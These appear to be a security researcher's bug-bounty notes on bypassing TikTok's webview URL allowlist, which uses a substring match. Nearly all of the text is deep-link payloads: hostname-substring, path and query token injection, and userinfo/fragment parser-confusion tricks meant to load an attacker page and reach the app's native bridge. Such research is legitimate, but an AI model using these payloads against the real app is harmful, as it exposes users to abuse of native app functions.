TikTok webview allowlist-bypass — lrd0036

Bare boguefala.us was blocked "unsafe". The allowlist match is indexOf (substring) on hostname+pathname, so embedding an allowlisted token should slip past. WIN = red PoC page renders inside TikTok. On the page, a populated webkit.messageHandlers = the native bridge was injected into our origin.

1 · baseline (should still be blocked)

webview?url=boguefala.us/poc (control)

2 · hostname-substring bypass (host contains "tiktok.com")

webview?url=tiktok.com.boguefala.us/poc ad_webview?url=tiktok.com.boguefala.us/poc

3 · path-injection bypass (path contains allowlisted token)

…/tiktok.com …/poc?x=tiktok.com …/poc?x=.tiktokv.com …/poc?x=webcast

4 · userinfo / fragment parser confusion

https://[email protected]/poc …/poc#.tiktok.com

5 · controls

open tiktok.com.boguefala.us in Safari (should render)